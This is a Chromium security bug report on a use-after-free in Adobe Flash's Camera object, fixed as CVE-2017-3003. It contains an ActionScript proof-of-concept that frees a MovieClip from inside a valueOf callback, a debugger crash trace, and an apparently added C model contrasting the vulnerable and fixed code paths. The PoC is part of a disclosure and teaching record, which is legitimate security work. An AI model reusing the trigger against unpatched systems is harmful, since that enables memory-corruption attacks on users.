
Issue 676778 link

Starred by 1 user

Issue metadata

Status: Fixed
Owner:
Last visit > 30 days ago
Closed: Nov 2017
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: 1
Type: Bug-Security




Security: Adobe Flash Camera Object Use After Free

Reported by xiong12...@gmail.com, Dec 23 2016

Issue description


VULNERABILITY DETAILS
Adobe Flash Camera Object Use After Free

VERSION
Chrome Version: 56.0.2924.28 beta (64-bit)
Operating System: Windows 7 en 64-bit

REPRODUCTION CASE

Open "TestCamera.html.html" with Chrome.
When the camera settings dialog pops up, click the "deny" button, then observe Chrome crash.


This is a use after free bug when using the camera object.

The function ASnative(2107, 0) takes a number parameter. If we pass in an object with a valueOf callback function and remove the
MovieClip in the callback function, a use-after-free occurs:

var my_cam:Camera = Camera.get();
var my_video:Video = display.video;

// MovieClip whose removal inside the valueOf callback triggers the bug
var mc:MovieClip = _root.createEmptyMovieClip("mc", _root.getNextHighestDepth());
mc.func = _global.ASnative(2107, 0);

my_video.attachVideo(my_cam);

my_cam.onStatus = function(infoObj:Object) {
    if (my_cam.muted) {
        // The "number" argument is an object; converting it runs valueOf,
        // which removes mc while the native function is still using it.
        var aaa = mc.func({ valueOf: function() {
            mc.removeMovieClip();
            return -2;
        }});
    }
};




FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab
Crash State: 


(1b1c.1d40): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Users\yuki\AppData\Local\Google\Chrome\User Data\PepperFlash\24.0.0.186\pepflashplayer.dll - 
pepflashplayer!PPP_ShutdownBroker+0x26edd9:
000007fe`d43c3569 488b7a50        mov     rdi,qword ptr [rdx+50h] ds:00000000`00000050=????????????????
8:097> k
Child-SP          RetAddr           Call Site
00000000`0019cc50 000007fe`d43beae9 pepflashplayer!PPP_ShutdownBroker+0x26edd9
00000000`0019cd20 000007fe`d4364a53 pepflashplayer!PPP_ShutdownBroker+0x26a359
00000000`0019cd80 000007fe`d4541c5a pepflashplayer!PPP_ShutdownBroker+0x2102c3
00000000`0019cf90 000007fe`d43bf985 pepflashplayer!PPP_ShutdownBroker+0x3ed4ca
00000000`0019d740 000007fe`d443597a pepflashplayer!PPP_ShutdownBroker+0x26b1f5
00000000`0019d850 000007fe`d43c4422 pepflashplayer!PPP_ShutdownBroker+0x2e11ea
00000000`0019d880 000007fe`d43bd8e7 pepflashplayer!PPP_ShutdownBroker+0x26fc92
00000000`0019d8d0 000007fe`d43c1d27 pepflashplayer!PPP_ShutdownBroker+0x269157
00000000`0019d940 000007fe`d43bd69f pepflashplayer!PPP_ShutdownBroker+0x26d597
00000000`0019d9a0 000007fe`d43c4192 pepflashplayer!PPP_ShutdownBroker+0x268f0f
00000000`0019d9f0 000007fe`d4364a53 pepflashplayer!PPP_ShutdownBroker+0x26fa02
00000000`0019da20 000007fe`d4365a38 pepflashplayer!PPP_ShutdownBroker+0x2102c3
00000000`0019dc30 000007fe`d4342d9e pepflashplayer!PPP_ShutdownBroker+0x2112a8
00000000`0019dc90 000007fe`d453c000 pepflashplayer!PPP_ShutdownBroker+0x1ee60e
00000000`0019dd90 000007fe`d4541a70 pepflashplayer!PPP_ShutdownBroker+0x3e7870
00000000`0019de00 000007fe`d430cc79 pepflashplayer!PPP_ShutdownBroker+0x3ed2e0
00000000`0019e5b0 000007fe`d431045a pepflashplayer!PPP_ShutdownBroker+0x1b84e9
00000000`0019e650 000007fe`d41663ae pepflashplayer!PPP_ShutdownBroker+0x1bbcca
00000000`0019e950 000007fe`d416419c pepflashplayer!PPP_ShutdownBroker+0x11c1e
00000000`0019e990 000007fe`d4169176 pepflashplayer!PPP_ShutdownBroker+0xfa0c


Credit:

Please credit "Yuki Chen of Qihoo 360 Vulcan Team" for this bug. 
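The report above describes a classic re-entrancy use-after-free: a native function converts its argument to a number, that conversion runs script (valueOf), and the script removes the MovieClip the native is still holding a raw pointer to. The following C program is an added illustration of that bug class and its usual fix, written for this page; it is a constructed model with hypothetical names (native_vulnerable, native_fixed, mc_retain, mc_release), not Flash's real code or the Adobe patch. The vulnerable shape reports a simulated freed-memory access, while the hardened shape holds a reference across the callback and re-validates the object afterwards.

```c
#include <stdio.h>

/* Constructed model of the pattern in the report (hypothetical names; not
 * Flash's real code). A native function takes a "number" argument, converting
 * it may run script (valueOf), and that script may remove the MovieClip the
 * native is operating on. */

enum { STATUS_OK = 0, STATUS_REMOVED = 1, STATUS_USE_AFTER_FREE = 2 };

typedef struct MovieClip {
    int refcount;   /* references held by the display list and native code */
    int alive;      /* cleared by removeMovieClip() */
    int freed;      /* set when the last reference goes away (simulated free) */
    int depth;
} MovieClip;

/* An ActionScript value: either a plain number or an object with valueOf. */
typedef struct Value {
    int is_object;
    double number;
    double (*valueOf)(struct MovieClip *ctx);
    struct MovieClip *ctx;
} Value;

static MovieClip *mc_create(MovieClip *storage, int depth) {
    storage->refcount = 1;  /* owned by the display list */
    storage->alive = 1;
    storage->freed = 0;
    storage->depth = depth;
    return storage;
}

static void mc_retain(MovieClip *mc) { mc->refcount++; }

static void mc_release(MovieClip *mc) {
    if (--mc->refcount == 0)
        mc->freed = 1;  /* the memory would be returned to the allocator here */
}

/* Equivalent of mc.removeMovieClip(): the display list drops its reference. */
static void mc_remove(MovieClip *mc) {
    mc->alive = 0;
    mc_release(mc);
}

/* Converting the argument to a number may execute script. */
static double to_number(Value v) {
    return v.is_object ? v.valueOf(v.ctx) : v.number;
}

/* Vulnerable shape: the native keeps a raw pointer across the conversion. */
static int native_vulnerable(MovieClip *mc, Value arg) {
    double n = to_number(arg);          /* script runs here and may free mc */
    if (mc->freed)
        return STATUS_USE_AFTER_FREE;   /* in real code: a read of freed memory */
    mc->depth = (int)n;
    return STATUS_OK;
}

/* Hardened shape: keep the object alive across re-entry, re-validate after. */
static int native_fixed(MovieClip *mc, Value arg) {
    int status;
    mc_retain(mc);                      /* our reference outlives the callback */
    double n = to_number(arg);
    if (!mc->alive) {
        status = STATUS_REMOVED;        /* removed during the callback: bail out */
    } else {
        mc->depth = (int)n;
        status = STATUS_OK;
    }
    mc_release(mc);                     /* last use is over; freeing is now safe */
    return status;
}

/* Callback modelling the PoC's valueOf: remove the clip, return -2. */
static double removing_valueof(MovieClip *mc) {
    mc_remove(mc);
    return -2;
}

/* Runs one scenario on a fresh clip and returns the status the native reported. */
static int run_scenario(int hardened, int use_removing_callback) {
    MovieClip storage;
    MovieClip *mc = mc_create(&storage, 1);
    Value arg;
    if (use_removing_callback) {
        arg.is_object = 1; arg.number = 0; arg.valueOf = removing_valueof; arg.ctx = mc;
    } else {
        arg.is_object = 0; arg.number = 5; arg.valueOf = 0; arg.ctx = 0;
    }
    return hardened ? native_fixed(mc, arg) : native_vulnerable(mc, arg);
}

int main(void) {
    printf("vulnerable + removing valueOf: %d\n", run_scenario(0, 1));
    printf("hardened   + removing valueOf: %d\n", run_scenario(1, 1));
    printf("hardened   + plain number:     %d\n", run_scenario(1, 0));
    return 0;
}
```

The model never actually frees memory; the freed flag stands in for the allocator so the vulnerable path is observable rather than undefined behaviour. The fix has two halves, and both matter: the retain keeps the object's memory valid while script runs, and the alive check afterwards stops the native from operating on an object the script has logically removed.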
 

Comment 1 by aarya@google.com, Dec 24 2016

Components: Internals>Plugins>Flash
Owner: natashenka@google.com
Status: ExternalDependency (was: Unconfirmed)
Natalie, can you please file these bugs with Adobe. Thanks!

Comment 2 by aarya@google.com, Dec 24 2016

Labels: Security_Severity-High Security_Impact-Stable
Project Member

Comment 3 by sheriffbot@chromium.org, Dec 24 2016

Labels: M-55
Project Member

Comment 4 by sheriffbot@chromium.org, Dec 24 2016

Labels: Pri-1
Project Member

Comment 5 by sheriffbot@chromium.org, Jan 26 2017

Labels: -M-55 M-56
Labels: reward-topanel
Reported this today
This is PSIRT-6396
Yuki, I can't see the PoC anymore, did you delete it? Can you attach it again?
Project Member

Comment 10 by sheriffbot@chromium.org, Mar 10 2017

Labels: -M-56 M-57
This will be fixed in March as CVE-2017-3003.
Thank you for the status update.
Is it possible for this case to go to the reward panel now?
Project Member

Comment 13 by sheriffbot@chromium.org, Apr 20 2017

Labels: -M-57 M-58
Project Member

Comment 14 by sheriffbot@chromium.org, Jun 6 2017

Labels: -M-58 M-59
Project Member

Comment 15 by sheriffbot@chromium.org, Jul 26 2017

Labels: -M-59 M-60
Project Member

Comment 16 by sheriffbot@chromium.org, Sep 6 2017

Labels: -M-60 M-61
Project Member

Comment 17 by sheriffbot@chromium.org, Oct 18 2017

Labels: -M-61 M-62
Hello,

Since this vulnerability was fixed in March 2017, is it possible for this case to go to the reward panel now?
Status: Fixed (was: ExternalDependency)
Project Member

Comment 20 by sheriffbot@chromium.org, Nov 9 2017

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Project Member

Comment 21 by sheriffbot@chromium.org, Nov 11 2017

Labels: Merge-Request-63
Project Member

Comment 22 by sheriffbot@chromium.org, Nov 11 2017

Labels: -Merge-Request-63 Merge-Review-63 Hotlist-Merge-Review
This bug requires manual review: M63 has already been promoted to the beta branch, so this requires manual review
Please contact the milestone owner if you have questions.
Owners: cmasso@(Android), cmasso@(iOS), gkihumba@(ChromeOS), govind@(Desktop)

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Cc: awhalley@chromium.org lafo...@chromium.org
Pls apply appropriate OSs label.

+awhalley@ for M63 merge review.
Labels: -Hotlist-Merge-Review -M-62 -Merge-Review-63 M-63
No merge needed for Flash bugs.
Labels: -reward-topanel reward-unpaid reward-3000
*** Boilerplate reminders! ***
Please do NOT publicly disclose details until a fix has been released to all our users. Early public disclosure may cancel the provisional reward. Also, please be considerate about disclosure when the bug affects a core library that may be used by other products. Please do NOT share this information with third parties who are not directly involved in fixing the bug. Doing so may cancel the provisional reward. Please be honest if you have already disclosed anything publicly or to third parties. Lastly, we understand that some of you are not interested in money. We offer the option to donate your reward to an eligible charity. If you prefer this option, let us know and we will also match your donation - subject to our discretion. Any rewards that are unclaimed after 12 months will be donated to a charity of our choosing.
*********************************
Thanks! The VRP panel decided to award $3,000 to this, 676778, and issue 676773!
Labels: -reward-unpaid reward-inprocess
Project Member

Comment 28 by sheriffbot@chromium.org, Feb 15 2018

Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
